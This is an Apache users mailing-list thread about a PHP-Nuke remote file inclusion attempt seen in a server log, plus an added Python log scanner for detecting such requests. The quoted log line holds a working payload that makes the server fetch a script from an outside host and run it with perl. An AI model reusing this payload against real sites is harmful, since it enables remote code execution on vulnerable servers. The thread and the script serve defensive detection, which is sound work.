On 8/7/06, david <dvelayos@xxxxxxxxx> wrote:
Hello! Recently, I've found some entries in my Apache webserver log like this:

[IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a cmd.txt file from another site. Is there any way to detect these URLs to stop this by configuring Apache?
If this is actually working on your server, you need to immediately get rid of the application that is allowing it (php-nuke it seems), since it has a major security flaw.

In general, mod_security can be used to block suspicious URLs. But it is not a substitute for making sure you only use secure web applications.

Joshua.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
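
One way to find requests like the one quoted above in an access log, as an added example that is not part of the original thread: it flags query parameters whose decoded value is a remote URL or contains shell command separators. The log lines are constructed (documentation address ranges), and `scan`, `REMOTE_URL` and `SHELL_HINT` are names chosen for this example.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log format, parsed up to the response size.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) \S+')
# A parameter value that is itself a remote URL (remote file inclusion attempt).
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)
# Shell command separators or substitution in a decoded value (heuristic).
SHELL_HINT = re.compile(r'[;|`]|\$\(')

# Constructed sample lines, not taken from a real log.
SAMPLE = [
    '203.0.113.9 - - [05/Aug/2006:02:17:47 +0200] '
    '"GET /nuke/index.php?config=1&base_datapath=http://198.51.100.7/cmd.txt?'
    '&cmd=cd%20/tmp/;perl%20x.txt HTTP/1.0" 200 220151 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [05/Aug/2006:02:18:01 +0200] '
    '"GET /index.php?page=news&id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (host, status, param, reason) for each suspicious query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        # Split on '&' by hand so ';' inside a value is kept for inspection.
        query = m['target'].partition('?')[2]
        for pair in query.split('&'):
            name, _, raw = pair.partition('=')
            value = unquote_plus(raw)
            if REMOTE_URL.match(value):
                findings.append((m['host'], int(m['status']), name, 'remote-url'))
            elif SHELL_HINT.search(value):
                findings.append((m['host'], int(m['status']), name, 'shell-chars'))
    return findings

if __name__ == "__main__":
    for host, status, param, reason in scan(SAMPLE):
        print(f"{host} status={status} param={param} reason={reason}")
```

A 200 status only shows that the script answered, not that the inclusion worked. Legitimate parameters that carry URLs (redirect targets, for example) will also be flagged and need an allowlist.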